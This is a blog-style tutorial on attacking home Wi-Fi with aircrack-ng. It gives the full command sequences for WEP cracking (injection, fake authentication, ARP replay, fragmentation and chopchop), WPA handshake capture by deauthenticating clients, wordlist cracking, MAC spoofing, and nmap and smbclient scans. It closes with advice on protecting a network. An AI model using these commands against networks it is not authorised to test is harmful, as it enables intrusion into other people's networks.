It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.I will use Ubuntu (Gnome desktop) under root account with some non-default tools
apt-get install nmap macchanger
You will need to install aircrack-ng and adapter drivers from sources to get lastest version.
I got Edimax EW-7318USg for ~$30 as recomended devices.
Shortcuts I will use in aircrack-ng suite.
AP-MAC - MAC address of access point (AP), examples:
AP-CH - channel AP is working on, ex: 11
AP-NAM - wireless network name, ex: teddy
MY-MAC - MAC address of your adapter, ex: 001f1f3676fc
CL-MAC - MAC address of client already assosiated with AP (will need for DeAuth attack), ex: 012345abcdef
Interface I will use rausb0.
Simple WEP Crack
Put the card to monitor mode
airmon-ng stop rausb0
airmon-ng start rausb0
And let's start scan
airodump-ng rausb0
Get target network and try if we can inject packets
aireplay-ng -9 -e AP-NAM -a AP-MAC rausb0
test on all rates
aireplay-ng -9 -e AP-NAM -a AP-MAC -B rausb0
Start capturing IVs for target network to files
airodump-ng -c AP-CH --bssid AP-MAC -w output rausb0
Fake authentication with the access point otherwise it will deny our packets
aireplay-ng -1 0 -e AP-NAM -a AP-MAC -h MY-MAC rausb0
aireplay-ng -1 6000 -o 1 -q 10 -e AP-NAM -a AP-MAC -h MY-MAC rausb0
Start aireplay in ARP request replay mode
aireplay-ng -3 -b AP-MAC -h MY-MAC rausb0
Or replay packets from a wireless client
aireplay-ng -2 -a AP-MAC -d ffffffffffff -m 68 -n 68 -t 1 -f 0 rausb0
Or access point to rebroadcast the packet
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
ARP packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes
aireplay-ng -2 -p 0841 -m 68 -n 86 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
Or aireplay can be used to replay packets from a pcap file
aireplay-ng -2 -p 0841 -b AP-MAC -h MY-MAC -r replay_src-0303-124624.cap rausb0
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC -r some-capture.cap rausb0
Or use ready-to-send packet
aireplay-ng -2 -r arp-request rausb0
When you got from 40K to 80K data packets, we can try to crack the password
aircrack-ng -b AP-MAC output*.cap - PTW method
aircrack-ng -z -b AP-MAC output*.cap - FMS/KoreK method
When no wireless clients exists
Fragmenation attack to obtain PRGA
aireplay-ng -5 -b AP-MAC -h MY-MAC rausb0
Chopchop attack to obtain PRGA
aireplay-ng -4 -b AP-MAC -h MY-MAC rausb0
You will get some "fragment-0203-180343.xor" file for the next step.
Use packetforge-ng to create an arp packet
packetforge-ng -0 -a AP-MAC -h MY-MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request
You can inspect created packet
tcpdump -n -vvv -e -s0 -r arp-request
Since you are testing against your own AP (you are, right?), then decrypt the packet and ensure it is correct
airdecap-ng -e AP-NAM -w
View the decrypted packet
tcpdump -n -r arp-request-dec
How to Crack WPA/WPA2
The only way is to capture 4-way authentication handshake
Connected client deauth once
aireplay-ng -0 1 -a AP-MAC -c CL-MAC rausb0
or 3 times (to be sure ;-)
aireplay-ng -0 10 -a AP-MAC -c CL-MAC rausb0
For cracking, you will need good wordlists
aircrack-ng -w password.lst,another.lst -b AP-MAC wpa*.cap
Other useful stuff
MAC address change - manual way
ifdown rausb0
ifconfig rausb0 hw ether 00:11:22:33:44:55
ifup rausb0
But better with
macchanger --mac 00:11:22:33:44:55
Set bitrate
iwconfig rausb0 rate 54M
iwconfig rausb0 rate 11M
Scan network for devices
nmap -sP 10.0.0.1-255
Scan services on specific device
nmap 10.0.0.16
nmap -NP 10.0.0.16
Windows information and shares (if open)
smbclient -L \\10.0.0.16
smbclient -L \\10.0.0.16 -U Guest -W workgroup
Kernel modules control
lsmod | grep 73
modprobe rt73
Trace packets by
tcpdump -n -vvv -s0 -e -i
Gnome NetworkManager (sometimes better to stop it during attacks)
/etc/init.d/NetworkManager start|stop|restart
nm-tool --list
tail -f /var/log/daemon.log | grep NetworkManager
Links
aircrac-ng tutorials and faq
Latest nmap
So, to protect your wireless network, don't use WEP, use WPA/WPA2 with long and complicated password, MAC-filtering will only pause hacker for a while (till he can see one of authenticated clients MACs), hiding SSID doesn't help at all.
UPD: Good news there from aircrack team:
updated Slitaz aircrack distribution (Aircrack-ng 1.0 final including sqlite airolib-ng support, patched drivers, etc)
WPA Cracker - cloud cracking service
No comments:
Post a Comment